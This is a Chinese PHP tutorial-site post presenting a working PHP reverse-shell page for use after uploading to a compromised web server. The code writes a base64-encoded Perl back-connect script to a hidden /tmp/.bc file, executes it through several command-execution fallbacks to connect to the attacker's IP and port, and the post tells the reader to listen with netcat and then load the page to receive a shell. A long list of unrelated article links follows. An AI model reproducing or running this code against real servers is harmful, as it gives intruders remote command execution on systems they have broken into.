php反弹shell实现代码


Posted in PHP onApril 22, 2009

非常无 奈,没想 到什么好的办法,后来灵光一闪。放一个php页面,里面 可以直接弹回来shell,何况在console下面操作比webshell方便的多,也不会出现超时之类的情况。
因为我不怎么懂php,于是就找了猥琐 的诺诺和小雨修改了一下代码,反弹代码是从phpspy2008里面提取的,但是不能直接用,需要修改成一个单独的php文件。上传之后,本地监听一个端 口,在代码里设置好反弹IP和端口,然后直接访问,就会弹回来一个shell。
声明,没啥技术含量,主要是用来方便。这样每次可以直接访问这个php页面,直接弹回来shell,不用做其他繁琐的操作,下面贴出来已经修改好的代码

<?php 
function which($pr) { 
$path = execute("which $pr"); 
return ($path ? $path : $pr); 
} 
function execute($cfe) { 
$res = ''; 
if ($cfe) { 
if(function_exists('exec')) { 
@exec($cfe,$res); 
$res = join("\n",$res); 
} elseif(function_exists('shell_exec')) { 
$res = @shell_exec($cfe); 
} elseif(function_exists('system')) { 
@ob_start(); 
@system($cfe); 
$res = @ob_get_contents(); 
@ob_end_clean(); 
} elseif(function_exists('passthru')) { 
@ob_start(); 
@passthru($cfe); 
$res = @ob_get_contents(); 
@ob_end_clean(); 
} elseif(@is_resource($f = @popen($cfe,"r"))) { 
$res = ''; 
while(!@feof($f)) { 
$res .= @fread($f,1024); 
} 
@pclose($f); 
} 
} 
return $res; 
} 
function cf($fname,$text){ 
if($fp=@fopen($fname,'w')) { 
@fputs($fp,@base64_decode($text)); 
@fclose($fp); 
} 
} 
$yourip = "your IP"; 
$yourport = 'your port'; 
$usedb = array('perl'=>'perl','c'=>'c'); 
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj". 
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR". 
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT". 
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI". 
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". 
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". 
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; 
cf('/tmp/.bc',$back_connect); 
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &"); 
?>

先在本地执行 nc -l -vv -p port 然后访问这个php页面 http://www.site.com/fuck.php 本地就会得到一个反弹的shell。
仅限猥琐流使用,如果有什么好的猥琐的方法,请不吝赐教
PHP 相关文章推荐
用PHP实现登陆验证码(类似条行码状)
Oct 09 PHP
dede3.1分页文字采集过滤规则详说(图文教程)续二
Apr 03 PHP
php学习之变量的使用
May 29 PHP
浅析PHP中的字符串编码转换(自动识别原编码)
Jul 02 PHP
php打开远程文件的方法和风险及解决方法
Nov 12 PHP
laravel 5 实现模板主题功能
Mar 02 PHP
php遍历解析xml字符串的方法
May 05 PHP
thinkPHP分组后模板无法加载问题解决方法
Jul 12 PHP
php cookie 详解使用实例
Nov 03 PHP
PHP基于自增数据如何生成不重复的随机数示例
May 19 PHP
thinkphp5引入公共部分header、footer的方法详解
Sep 14 PHP
Laravel框架实现多个视图共享相同数据的方法详解
Jul 09 PHP
将数组写入txt文件 var_export
Apr 21 #PHP
php 保留小数点
Apr 21 #PHP
PHP 中执行排序与 MySQL 中排序
Apr 21 #PHP
一个php导出oracle库的php代码
Apr 20 #PHP
php一句话cmdshell新型 (非一句话木马)
Apr 18 #PHP
对squid中refresh_pattern的一些理解和建议
Apr 17 #PHP
PHP 加密与解密的斗争
Apr 17 #PHP
You might like
献给php初学者(入门学习经验谈)
2010/10/12 PHP
php中的curl使用入门教程和常见用法实例
2014/04/10 PHP
Laravel 4 初级教程之安装及入门
2014/10/30 PHP
PHP中数据类型转换的三种方式
2015/04/02 PHP
php将html转成wml的WAP标记语言实例
2015/07/08 PHP
PHP中模糊查询并关联三个select框
2017/06/19 PHP
jquery简单瀑布流实现原理及ie8下测试代码
2013/01/23 Javascript
巧用jquery解决下拉菜单被Div遮挡的相关问题
2014/02/13 Javascript
关于javaScript注册click事件传递参数的不成功问题
2014/07/18 Javascript
js实现点击后将文字或图片复制到剪贴板的方法
2014/08/04 Javascript
JavaScript把数组作为堆栈使用的方法
2015/03/20 Javascript
JS模式之单例模式基本用法
2015/06/30 Javascript
jquery ajax分页插件的简单实现
2016/01/27 Javascript
轻松掌握jQuery中wrap()与unwrap()函数的用法
2016/05/24 Javascript
JavaScript页面实时显示当前时间实例代码
2016/10/23 Javascript
基于JS实现弹出一个隐藏的div窗口body页面变成灰色并且不可被编辑
2016/12/14 Javascript
jquery实现折叠菜单效果【推荐】
2017/03/08 Javascript
深入浅析javascript继承体系
2017/10/23 Javascript
使用jQuery如何写一个含验证码的登录界面
2019/05/13 jQuery
windows实现npm和cnpm安装步骤
2019/10/24 Javascript
Python中删除文件的程序代码
2011/03/13 Python
Python中的迭代器漫谈
2015/02/03 Python
Python的条件语句与运算符优先级详解
2015/10/13 Python
Pytorch Tensor 输出为txt和mat格式方式
2020/01/03 Python
python设置环境变量的作用整理
2020/02/17 Python
Python yield的用法实例分析
2020/03/06 Python
Python导入父文件夹中模块并读取当前文件夹内的资源
2020/11/19 Python
Django集成MongoDB实现过程解析
2020/12/01 Python
Omio中国:全欧洲低价大巴、火车和航班搜索和比价
2018/08/09 全球购物
广州地球村科技数据库题目
2016/04/25 面试题
造型师求职自荐信
2013/09/27 职场文书
护理专业应届毕业生推荐信
2013/11/15 职场文书
平安校园建设方案
2014/05/02 职场文书
党在我心中的演讲稿
2014/09/13 职场文书
实习生个人总结范文
2015/02/28 职场文书
《风不能把阳光打败》读后感3篇
2020/01/06 职场文书